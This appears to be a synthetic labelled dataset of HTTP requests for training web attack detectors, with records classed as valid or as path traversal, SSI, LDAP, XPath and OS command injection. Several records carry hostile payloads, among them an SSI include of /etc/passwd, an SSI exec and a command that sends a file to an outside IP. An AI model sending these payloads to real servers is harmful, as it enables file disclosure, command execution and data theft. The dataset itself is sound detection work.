Authorization: Digest response="B5d1b5Eee005A9e34C791549c23070cD"
Referer: /eedMfh/enP1/LDhjeat/h7eei/beeu.swf
TE: chunked,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.0 (compatible; Konqueror/8.4; Solaris; aitnaIt)
UA-CPU: StrongARM
UA-Pixels: 648x2225
Via: 9.5 www.Imnpntk.gif, 8.7 www.ntsrgep.css, eodu/5.4 14.147.41.11
Transfer-Encoding: 0reu
Upgrade: 8ez/8.7, Wuay/5.7
Warning: 915 23.102.86.169 "8rrnetn" 
X-Forwarded-For: 67.104.67.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46355
Start - Id: 45156
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: www.tTttc6dsh.biz
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i, isiri-3342, x-mac-chinesesimp;q=0.4
Accept-Encoding: compress;q=0.0, deflate, identity, identity, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 168.50.166.68
Cookie: 7ncvgmO-T=60479252
Cookie2: $Version="70"
Date: Wed, 12 Jan 05 05:04:29 GMT
ETag: W/"Ad6SHvLZ2aQiVBoxCHk"
Expect: sIseObpe
From: hdOf9re@eutwEh.uk
If-Modified-Since: Fri, 30 Jul 04 17:35:22 CET
If-Unmodified-Since: Fri, 18 Feb 05 14:07:59 UTC
If-Match: "R8jeAAwLGcjhdVU"
If-None-Match: *
If-Range: Mon, 02 Oct 06 16:27:43 CET
Max-Forwards: 1
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: NTLM Nm9uZ3pybHUyYWZwOXJvQWtPaTdrcmdzb2ZlYTJ1ZDdENEN0ag==
Referer: /uAluzett/iewO.gz
TE: chunked;q=0.7,deflate;q=0.6
Trailer: Date
User-Agent: addmtiM
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: z5me
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 845 www.yohtvu.htm:3657 "hi7s4a" 
X-Forwarded-For: 249.70.128.210
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45156
Start - Id: 6937
class: Valid
POST /me1cishsjuiehahsJetI/07YeUk1PuyxPxXy_..AF/hR/pRii4dmdawwhntydaea3/li0xr/zl4C2t/pucamteit52ral/ni4hhmhEdaleor.htm? HTTP/1.1
Content-Length: 169
Content-Language: 3
Content-Encoding: gzip
Content-Location: http://dhha.fr/mTr1bowt/4rd95o/EsfaE/0bds.zip
Content-MD5: YTlwaUk3RXJpbDllczI3cQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Feb 04 08:47:31 UTC
Last-Modified: Fri, 08 Jul 05 24:34:41 UTC
Host: 255.247.71.163:4409
Connection: nvesds
Accept: */*;q=0.6
Accept-Charset: iso-8859-8;q=0.3, hz-gb-2312;q=0.2
Accept-Encoding: 
Accept-Language: y8s3oi-6gaN, n9iuur-uAgahlua
Cache-Control: limns=o7saEn
Client-ip: 158.35.126.167
Cookie: datergpde=afv7E
Cookie2: $Version="44"
Date: Mon, 10 May 04 01:06:53 CET
ETag: "dEUa-f.7nT1NUGyZ"
Expect: 100-continue
From: 9tasgo@r6haat.org
If-Modified-Since: Thu, 24 Dec 09 15:37:36 CET
If-Unmodified-Since: Mon, 03 Apr 06 17:16:43 CET
If-Match: "OEXM9Nomzl3hL_C5w"
If-None-Match: "OLWnvP7PP_Sj6-q6ObzS"
If-Range: *
Max-Forwards: 5
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="1sg3"
Authorization: NTLM Y2hiaFR3ZWt5dWh6YWUwY3B0aGRkN3V0cmVlZTUzSTRPbA==
Range: -35,310954-4,-65030
Referer: http://peiha.be/ardjao/ueTd2F/t0ja/suAeudie/3opdise.pdf
TE: deflate,trailers,chunked;q=0.5
Trailer: From
User-Agent: bxeObr3wlipsoaN
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 751x6296
Via: wmnr/3.9 161.124.54.47, 4.0 14.141.208.111
Transfer-Encoding: saan; iTbu3ch=oo3Nri
Upgrade: eRoin/5.2, vsm/1.5, to6a/3.8, h0t/3.0
Warning: 250 59.47.69.234 "dllcxoqieenmhiSaaaes" 
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 95729667
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~

deie4kniadhjn=lcUUR_j&eye64aim7oeakfh=01sILgRS8W&andUom=tedn1wlklaermeirsm&Ojost=s&Ltcsk3e=t+s52uhedet2uhZ&hbpgz=30&yni7T=924862&i-Uj7PL.0L_=xrt&u2IaladnAk3n=pe.8ljtkM

End - Id: 6937
Start - Id: 39772
class: SSI
GET /zeDXRe3e/hltWfbdSFFz1.jpg?3mmzO-=60525&bndaDeraeL=%3C%21--++++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E HTTP/1.1
Host: www.trth.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eo7cSe-kidtm;q=0.2, ieeuutt-sacYBeh, Ecl-h, tpyltp-sctaobeo;q=0.2
Cache-Control: s=ttoegdh
Client-ip: 57.60.160.157
Cookie: awgrrioueon2eo=579289890;MKLiDVikR=ns;memi9ae=7267738518
Cookie2: $Version="83"
Date: Mon, 16 Jan 06 06:39:49 GMT
ETag: W/"16rXq6CpTaDcd-iF"
Expect: 100-continue
From: 6Rvlor@tljncre.cz
If-Modified-Since: Fri, 08 Sep 06 13:53:33 GMT
If-Unmodified-Since: Sun, 19 Jun 05 24:51:32 UTC
If-Match: *
If-None-Match: "nRzVkoSLpeL56v1"
If-Range: Mon, 19 Nov 07 01:25:07 GMT
Max-Forwards: 6
MIME-Version: 5.1
Pragma: lN='t4hepako'
Proxy-Authorization: aqmos h5eilr=rpma
Authorization: Basic ZTRoZzppb2RkYQ==
Range: 42-82,601-32,-86
Referer: /eaEte/krevl.mdb
TE: trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/8.5 (X11; U; Open BSD i586 8.6; ct-3l; rv:5.4.7) Gecko/34465228
UA-CPU: 68000
UA-Disp: 168,5642,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 357x4433
Via: 5.2 251.113.131.179, thcsex/4.8 67.143.79.15:071
Transfer-Encoding: identity
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39772
Start - Id: 39015
class: LdapInjection
PUT /lnNY7t/-qZ1o-np/MaKLSO3access_logR/tpnNz@6hGoIjAr/ldL-0/r1ogihswdo.php3? HTTP/1.0
Content-Length: 240
Content-Language: eesa,4p,x
Content-Encoding: gzip
Content-Location: http://www.1cle9.be/dshn/lamgv/h3usA/dsl3/Rcri.conf
Content-MD5: YXRmbG40Y3FsdHNsaWVhdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Aug 05 13:04:07 GMT
Last-Modified: Sat, 10 Jan 04 10:41:06 GMT
Host: www.dibsTr.com
Connection: rnlorn9
Accept: video/*, application/postscript;q=0.3
Accept-Charset: x-mac-greek;q=0.7, iso-10646-ucs-2;q=0.3
Accept-Encoding: 
Accept-Language: s-Smtndya;q=0.0
Cache-Control: only-if-cached
Client-ip: 103.25.9.144
Cookie: op=eUJF@-gibOFs;jrlc=8054;d8il=85638;pans=e'sdaehr4;2otaaalokdutng=eaniouanfg
Cookie2: $Version="997"
Date: Tue, 04 Jul 06 17:55:29 CET
ETag: W/"lXyrX6B53KtLWw4i1K3"
Expect: Oupd=rydr
From: rtYnihG@mn4eem.gov
If-Modified-Since: Mon, 19 Jun 06 16:47:38 CET
If-Unmodified-Since: Mon, 26 Jul 04 17:55:04 GMT
If-Match: "Zg44Z2A.QOrP0I8b"
If-None-Match: *
If-Range: Fri, 16 Sep 05 10:46:55 UTC
Max-Forwards: 19
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest username="raSsi"
Authorization: oae2n5 lfaLe3l=lwblep
Range: -085
Referer: http://www.jkhqtglb.uk/odmismo/eniro.jpeg
TE: chunked,chunked
Trailer: User-Agent
User-Agent: haeiy)(|  (entay=*)
UA-CPU: 68000
UA-Disp: 744,650,16
UA-Color: color16
UA-Pixels: 960x5747
Via: 5.0 252.60.126.24
Transfer-Encoding: identity
Upgrade: yuanig/5.9, tImh/5.1
Warning: 346 www.Oeee4mc.gif:8 "oeyoderem8srtNauan5" "Tue, 19 Aug 08 04:42:00 CET"
X-Forwarded-For: 236.228.179.215
X-Serial-Number: 13381334
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

SkXu.gwUgt=Ixi4nfmbpMti&ia=nte&fraltsCbaAaR=5571&tb4ns=h9qJ&reBtgdj=OI:stdines69replacet lty&jjt1toantbieH=vrlo&FDQzlI=49015&leF1oar5na=ki5&w0Zgusft=+ p&oeHhmPSEneeUl= l) xSo(Eib/8moe&DqWH03nE@Ueinsert=imgstdr1n&eytSDitsynyste=nd9

End - Id: 39015
Start - Id: 43354
class: OsCommanding
GET /za/eYqc3ktfa/iqtjqQqarFi/ecloH0B-5XJzqBh30/erhmeta.sh?GBOc2H=%27++++%3Buftp+++-g+++++%2Fhome%2Fniraalalte%2Fesntonse+++++60.213.162.62++++%2Fanma++++%3B&Sirfenpyeoae=wwiotioae&stvafpzen=97&aodrftlte=pxEiK7UsoI&Wlcmrhnerska=sEHi9GKzk&reiopxs6v=processing-instructionanalink5%3C%3FOsn HTTP/1.0
Host: 150.75.135.234
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: eespVnhl='wweri'
Client-ip: 39.142.10.38
Cookie: 0ain= i7q8;pofnewtohie=inracn6yrot;98AformR=SaosAtcieuUeeoh3
Cookie2: $Version="9"
Date: Thu, 15 Jun 06 09:30:04 GMT
ETag: W/"k1P9H2sZ4nonmQR5NYQ-"
Expect: 100-continue
From: ibnemn@5dtd.it
If-Modified-Since: Thu, 22 Feb 07 12:55:21 UTC
If-Unmodified-Since: Sun, 17 Oct 04 11:58:56 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Sep 09 07:58:25 CET
Max-Forwards: 40
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="faby1"
Authorization: ilfe8 aoOeoE=oetOtoI
Range: 33667-,-94
Referer: http://setcda.it/Acryetdm/nrcgkad/m4tssoad/Sett/rptiaynw.pdf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 5.3; ei-3h; rv:8.6.6) Gecko/38679684
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 331x628
Via: HTTP/0.0 68.201.151.85, eisdl/6.4 32.159.193.1:65006, HTTP/1.2 141.88.49.129:70
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 476 114.93.136.20 "eSSt" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43354
Start - Id: 595
class: Valid
GET /r-/i7/tEz8zmb/c9bm/rTessiim/i-hS/tRkAUG@PeoB3lYJB/xaEWFjKggomE/OY/e1RriUd8JO/qmtrtaaapdynszla/y88ghtaKS42.uk@.jpeg?Z3OX=326&G6UsEJ7z=32025&hqp5ieR6ef=ilOEo%28i%3Bl%3Fg&hjtn=rMFT-Fl0Z&idinsertAH_o7tCKn=t&Sos5ttesarEbunn=e+r&lshat=+oc3fa&rlbifmr1e6ndsen=iin&gjo0msshmt=159142&6ehhdeviozl=60291&jbLNTHnS=tCfFa6uu46&n@56HservicesmeIUHr=eXW&Eohb=nKYd&fEab=mcyEFT HTTP/1.1
Host: 46.240.80.13:64
Connection: keep-alive
Accept: video/*, audio/*;q=0.5
Accept-Charset: x-mac-arabic, cp-950, x-mac-chinesesimp;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 36.96.211.242
Cookie: eebinnr=9tnewdssezrenfesSe;leJsoHaos=stredeolm
Cookie2: $Version="23"
Date: Sat, 28 Apr 07 14:42:05 CET
ETag: "mpak1MNfePXIbOgS"
Expect: tiAta
From: i7wh@s1dUih1sA.it
If-Modified-Since: Tue, 29 Mar 05 12:45:17 CET
If-Unmodified-Since: Sun, 18 Dec 05 04:24:33 UTC
If-Match: "ZgkshK0tXrohX-1fv1i"
If-None-Match: *
If-Range: *
Max-Forwards: 2959
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest qop=spuelr
Authorization: Digest username="ony0re2e"
Range: 00-
Referer: http://www.cscrfua.fr/neaa/tttl/mUOh/t9sef4n2/n6Auznus.php4
TE: deflate;q=0.9,trailers
Trailer: Warning
User-Agent: uatttnd/6.8.3.7
UA-CPU: Sparc
UA-Disp: 8563,166,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 412x961
Via: monl/5.4 www.meitnaa.css, eh8s/4.6 www.whioo.tiff:56512
Transfer-Encoding: snar
Upgrade: thc/6.8
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 119.10.246.153
X-Serial-Number: 541499677250739
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 595
Start - Id: 34271
class: Valid
PUT /tpre/e3begPyF/trdht/spnT9uo/K8PcZA6pExmlBo/snAZ2QFtFV05lZaGQx/c1_abcaKAp9Fu-Oi/w8tedchutosbhiqectyl/9k.js? HTTP/1.0
Content-Length: 225
Content-Language: 0
Content-Encoding: compress
Content-Location: /eoshe/gwq2sSGt/nhihfepc.tar.gz
Content-MD5: YjhyVHlkOGVBbDA3aUl0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Dec 07 17:09:37 UTC
Last-Modified: Mon, 20 Oct 08 19:28:57 CET
Host: 113.109.195.241
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-2022-jp;q=0.8, ks_c_5601-1987, cp-936;q=0.1, iso-8859-15;q=0.3
Accept-Encoding: compress;q=0.1, compress, compress, gzip;q=0.6
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 230.93.189.9
Cookie: epdeo67bthgr=itt;aS7xo=ueibrvt3i1rae3nsdk;oahn4ehasc=0;bnSt1mqHettyueh=ltsoaducedf0oeVr;vdwie=t:7re7&oth7cij
Cookie2: $Version="072"
Date: Fri, 23 Nov 07 09:21:40 GMT
ETag: W/"pmTNHPYgCSciJwXH"
Expect: 100-continue
From: 4ytj@b9euc4sM.it
If-Modified-Since: Fri, 17 Oct 08 22:41:15 CET
If-Unmodified-Since: Mon, 14 Jan 08 22:27:46 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 22 May 09 11:14:00 CET
Max-Forwards: 1
MIME-Version: 6.1
Pragma: ezP=chesmi
Proxy-Authorization: NTLM c2k3QXN0dHNVa2FhM3hhZWlydGhjb3FOZWl1c2JjbmFp
Authorization: Digest username="tiut"
Range: -412,6-
Referer: /tsfIb/efoeewc.tar.gz
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.9 (compatible; Konqueror/0.9; Open BSD i586; a7axC; tarltasRa)
UA-CPU: 68000
UA-Disp: 1874,1837,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1417x508
Via: FTP/4.8 89.20.94.169, 7.4 www.yicBEsO.jpg, FTP/9.9 www.mshba.gif:7260
Transfer-Encoding: compress
Upgrade: ler/8.6, adth/8.2, itt/7.5
Warning: 445 www.dRtgo.jpeg "eeTzgb" 
X-Forwarded-For: 60.98.250.76
X-Serial-Number: 39183346351141805955
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mowrgerouriasi=i1Ld1nn8l2uolgct&5rfEP=90925294&1sehV=el +p&xRt6itos=ntanc&aBsR2dkptt=e:'scbsx[yhinodesyoLsinc&hoq0eou9=50724&eeltc6hEdwc0at=Ihtpass&tdiebib=0316&fbyomon=ich6oi&Ch80yenecrg=execoerphpkidapstnusr ~binr

End - Id: 34271
Start - Id: 33967
class: Valid
PUT /02iQ5a3pY9BDXjP-pTIH/dfPQQTSZHn/cgEdurLnhooonvaaa/ixEDT/to2ceFrpn5TLeed4kfBb/tdKRwf_5kt.C6/Peh7susvmstaiuida/ujS4/nttetTa2egprrae/ie6rdq2heyiieple/to/fl.png? HTTP/1.1
Content-Length: 17
Content-Language: aksse,erefsydd,ida
Content-Encoding: deflate
Content-Location: http://www.rGkot.fr/smshiTig/npise/cm19s/1en05tn/ebEn.bin
Content-MD5: Y09lSHRrZmJpbDRITGllbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Aug 08 03:57:42 GMT
Last-Modified: Wed, 04 Feb 04 16:15:55 UTC
Host: 116.219.254.180:80
Connection: 2anEeoue
Accept: */*;q=0.3
Accept-Charset: big5;q=0.9, x-mac-cyrillic, macintosh;q=0.0, iso-8859-8-i;q=0.8, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: Tl='4'
Client-ip: 80.189.190.203
Cookie: ebsvtntao=52118;nsesihit=o;jiWnzh=1;rejyE4r3bh=TThet=cs@we
Cookie2: $Version="64"
Date: Mon, 02 Apr 07 07:14:31 UTC
ETag: W/"PzjsPI7xKSQwK5p."
Expect: rkmhro=l1eel;rettlclG
From: oiaeoiR@daqe.cz
If-Modified-Since: Thu, 18 Nov 04 09:52:00 UTC
If-Unmodified-Since: Sat, 20 May 06 19:02:55 CET
If-Match: "B7Xbv2M0sEQAcc@"
If-None-Match: *
If-Range: "q@VttXb3bCMJ5ATso0m_"
Max-Forwards: 1489
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: xks6 amdtmb=T5la
Authorization: NTLM ZWp1ZXN0VGlzZDBnY2V5MGVyZWN0bWFub2RpcnVydGNvbE9vZXNoaTNld2VP
Range: 7-987,-0542
Referer: /inchdm/tndl9doL/msquhot/ry0ae.ace
TE: trailers
Trailer: Via
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 2.1; o3-zt; rv:3.8.0) Gecko/09442273
UA-CPU: x86
UA-Disp: 225,357,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5321x9359
Via: 9.1 www.mdaee4hq.png:6
Transfer-Encoding: esle; nepn8w=a9sn
Upgrade: ats/6.8, zai/9.1, pj4sli/5.2
Warning: 479 www.rirnPoa.css "MEsa0n6shefloReoC5" 
X-Forwarded-For: 48.2.222.131
X-Serial-Number: 33226
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

semcctrer=9770314

End - Id: 33967
Start - Id: 39148
class: SSI
GET /hY8bTiV-do5Rd/A5R/PL@7_/IT5sCL/sZxzD8pMnpubCA9/ee/nhRgX5PUVp4Ndh2/Ay.7-T_pHp/imo.msf?rSVzU=stE+insertn&nyomt=Ssihtaccesksrn&IHvHedO9foo=oep&hijeiasPptk2ri=eo+qupdatealibn&b0avmAmie2herd=lvMLaxW8Fp.&exnro8TP=processing-instructionca&EygI=lVcA9pb19V&hwdrhDaa=c6ioEfe&4c57du7hnl4EnOi=%3D+cd9&bat8=2973428&tawceBs9e=uhkFb&ut=Rhw&n3=06725&nndz=csexlblM4y&aOtUpu4yemDStb=ith HTTP/1.0
Host: 4.41.165.209
Connection: hinnjeaE
Accept: text/plain
Accept-Charset: us-ascii;q=0.0, windows-1254
Accept-Encoding: identity
Accept-Language: n-h, TzPilnn-iht, ta-lo
Client-ip: 70.242.99.139
Cookie: BNinputXr=<!-- #exec  cgi="/cgi-bin/script?dr8eoiE"  -->
Cookie2: $Version="129"
Date: Fri, 05 Jun 09 20:14:13 CET
ETag: W/"Fk-Y-4pUDYfvKJYwN"
If-Match: *
If-Range: "WsBeGLdO7uWLtKp"
Max-Forwards: 643
Pragma: hFtOe=alsei
Range: 9-,06864-
Referer: http://www.risqhbee.be/fysao/AFtei/erthIea/hi3eYlh/pmos4ImN.avi
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 4.5; tm-nR; rv:7.2.3) Gecko/79433307
UA-Pixels: 3819x400
Transfer-Encoding: identity
Upgrade: eeey/9.3

null

End - Id: 39148
Start - Id: 26013
class: Valid
GET /sl/bihgo.asmx?rbgnuki=45527&int=ebinsn%3Eythl%40utxp_jme&srcsncaaaaitral=e%7CetgteW%3AdDib&Stro=Utaae8o&la=t%5CN%40d&si=9888&ouooptrebr=1&att1odapddi=eEVtBDo&ua9ee9t58=6614&CDencolU=l%7Ce%3Akwlt7lga%28&QrlogT_3IuandhR=3411&eebTAasis=%3Fcn HTTP/1.0
Host: 208.170.189.12
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: xrsai-lomTa, eoeor4h-lrv, an-pmeos;q=0.3, aqeea2e9-trI0Ruo, sdl-rnceyee4;q=0.3
Cache-Control: hahaubta=yrv
Client-ip: 254.230.111.50
Cookie: no=cT6TTlhuGeaie;ljDEyIvq-or=i;RbWJ=hHvDSjpHgA;pewdeT=4
Cookie2: $Version="46"
Date: Tue, 04 May 04 10:20:31 UTC
ETag: "mq89UzTOtnZyGuZuv"
Expect: hmrtyoF
From: rerwoEN@echst.gov
If-Modified-Since: Thu, 03 Jan 08 05:59:27 GMT
If-Unmodified-Since: Sun, 19 Nov 06 08:50:26 CET
If-Match: *
If-None-Match: "jSYfbjn_41WMsdJ"
If-Range: Fri, 28 Dec 07 02:27:45 GMT
Max-Forwards: 6
MIME-Version: 9.6
Pragma: nnx=n8
Proxy-Authorization: Basic dHVhZHg6aEhFenJuZA==
Authorization: int3j hewrw3=donnt
Range: 93614-
Referer: http://tutfold.gov/ldTj/r6h4sc/cImh/iqca/p7v0eeut.avi
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: Mozilla/7.2 (Machintosh; U; PPC 4.9; 4l-lA; rv:3.1.0) Gecko/43657604
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8535x949
Via: 6.7 www.otzas.js:9370, 7.0 212.178.216.143, 4.1 www.aaefa.css
Transfer-Encoding: identity
Upgrade: yuk/5.7, RisS/8.9
Warning: 954 235.185.114.28 "nlyee" 
X-Forwarded-For: 212.90.246.248
X-Serial-Number: 2136376568868794089
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26013
Start - Id: 18634
class: Valid
GET /PT/orLbincludeA1I_updateU.EA-s/kbvtopya9hceea8Ari/9uxake3QD74vV5nDW4v3/jEJmQR7jWh4e5@V/a6aS1c6borathnEhar/a_gOEuPb/nlnPSii/ud5@8ZlKGn7tkCx25y/ro8trgnvhbeaeattak/l7indnmdwdiuy/erctiro.mspx?hatoSpstet=cnzRoB7iPwR&hfotiokfneah=at&ean=te&noeeeehratiAg=758&snEyxh3iytesrxe=teoe5aaunionabo&igote6tdosvoh=cLhecho&AdhbrsDo1eei=%5C%24NEmt&Im=e%3D&slarrnsf=53573&h8ta0c=xs%3Bexecysyak%5De3se&eTR.rqlibGD=%5Bctrs%24raO%24End+etwae HTTP/1.1
Host: www.o2eherIx.net:58
Connection: keep-alive
Accept: audio/*, video/*;q=0.6
Accept-Charset: iso-8859-1;q=0.8, isiri-3342;q=0.4, iso-10646-ucs-2;q=0.0, iso-8859-7;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 62.252.65.0
Cookie: seh0raykioRaaY=20453255;s0eghzsTgsi=uhtbn;se=9726441500
Cookie2: $Version="4"
Date: Sat, 04 Aug 07 03:10:21 CET
ETag: W/"FtVc2EHXEHroTDw6OAEP"
Expect: 6Vteq
From: ddntue@tluT1lauo.gov
If-Modified-Since: Tue, 06 Apr 10 15:33:00 GMT
If-Unmodified-Since: Sun, 05 Oct 08 09:37:16 GMT
If-Match: *
If-None-Match: "2vbu.d4_fuUzjy5d9hU"
If-Range: Fri, 19 May 06 04:39:50 UTC
Max-Forwards: 6791
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=etukCscs
Authorization: NTLM cW1pZGc0c3llbHd0ZWVFN2d1dHRwdDJpbmVlSW5GeHd5ZW93T3RsbG50YWh4aG91
Range: -0
Referer: http://www.i5isiu.net/reetBeob/uwuar9.css
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: ddt4dR/0.0
UA-CPU: x86
UA-Disp: 7139,4412,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7882x967
Via: 9.5 www.rthhyl.shtml
Transfer-Encoding: xiseie
Upgrade: ndniu/9.9, rsSssn/8.8, bry2/5.0, aEnc/1.0
Warning: 871 165.27.62.53 "hetiwpovou9" 
X-Forwarded-For: 157.146.253.229
X-Serial-Number: 41593026
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18634
Start - Id: 48889
class: XPathInjection
GET /c5LVdWaXdx6kTD.tiff?rvte=%28i+++++%3C++++count%28is%2Fchild%3A%3Atext%28%29%29++++and+++++j+++++%3C+count%28sai5%2Fchild%3A%3Acomment%28%29%29+++and++++k++%3C+++count%28ActRh%2Fchild%3A%3A*%29+++++%29&eni5vOiyy1et=462 HTTP/1.0
Host: 109.251.216.125
Connection: close
Accept: */*
Accept-Charset: cp-936
Accept-Encoding: deflate, gzip, deflate, gzip, identity
Accept-Language: 7n4k4ihl-eet, dousj1a-ntieh;q=0.9, 9-cioh, sp1crt-gahemRw
Cache-Control: max-stale=19414
Client-ip: 230.107.51.66
Cookie: AyfajmodcteE=y9FOyhYeUba1;sjrrk=2;rtre8oiiwrjkn=ha6hprocessing-instructionas2po
Cookie2: $Version="74"
Date: Tue, 31 Oct 06 17:59:55 UTC
ETag: "yoHUBRdDJNDe7kMqNoJu"
Expect: 100-continue
From: Cwemtetz@wf3dzee.it
If-Modified-Since: Sat, 05 Apr 08 19:54:32 CET
If-Unmodified-Since: Thu, 12 Jun 08 13:29:51 CET
If-Match: *
If-None-Match: "b5U_PH56mbZCgza1K3bn"
If-Range: *
Max-Forwards: 3558
MIME-Version: 4.6
Pragma: 3istR=ee8
Proxy-Authorization: Digest opaque="ueen"
Authorization: NTLM cmllaWllZWk1YXN5N21hdmRlaW5ua3RuRHBlZWR0bGxvc2xl
Range: 87-22
Referer: http://LoZian.cz/jSety/1nbyxo.jpg
TE: deflate,chunked
Trailer: User-Agent
User-Agent: DVssE9de5w (lkvjvJapoG; ozFgKnN; um2L__V7_; 6c.EdI58)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: 7.7 www.di78rIn.jpeg, 0.3 2.222.163.211
Transfer-Encoding: gzip
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 4777989282549
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48889
Start - Id: 37418
class: LdapInjection
GET /0inSxDn6B3GgYo/rSd4-C6db.swf?AxpQ=qia&od=opye&Hi=29031205&PTGfX=ld&a7tev=Wpacarrtanin&A4Gr9wIusrwA=8&nyutaw=WoefbitdgTnoder%264cje&1mbfyheEiylepn=hhstmpq9ua&de1thi=zjsystemInie5hceo-e1 HTTP/1.0
Host: www.essd3psosh.com:6
Connection: keep-alive
Accept: */*
Accept-Charset: big5, big5;q=0.2, iso-8859-1, koi8
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 26.125.237.187
Cookie: toyE=)    (| (swans=era*)
Cookie2: $Version="3"
Date: Tue, 01 Jun 04 20:37:37 GMT
ETag: "JZu@KiU48zcihYgrzFG"
Expect: 100-continue
From: alaHcor@ktljooA.cz
If-Modified-Since: Thu, 09 Mar 06 23:49:06 CET
If-Unmodified-Since: Wed, 08 Mar 06 11:53:37 GMT
If-Match: *
If-None-Match: "txFqJHAKNkjYN55uStY"
If-Range: Mon, 07 Jun 04 09:35:03 UTC
Max-Forwards: 4604
MIME-Version: 3.7
Pragma: re='nc'
Proxy-Authorization: Digest cnonce="EOlts"
Authorization: Digest algorithm=MD5-sess
Range: 747728-0693
Referer: http://www.Aysei4.gov/hcuwnxh/Gmb8/lNiuRte.pl
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: Mozilla/8.1 (X11; U; Open BSD i586 9.2; ne-xn; rv:6.0.2) Gecko/49037002
UA-CPU: Sparc
UA-Disp: 8897,3460,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 359x5733
Via: 9.4 18.23.158.2, 5.9 www.GNNt5r.jpeg
Transfer-Encoding: gzip
Upgrade: inCnt/4.0, wfn/1.0
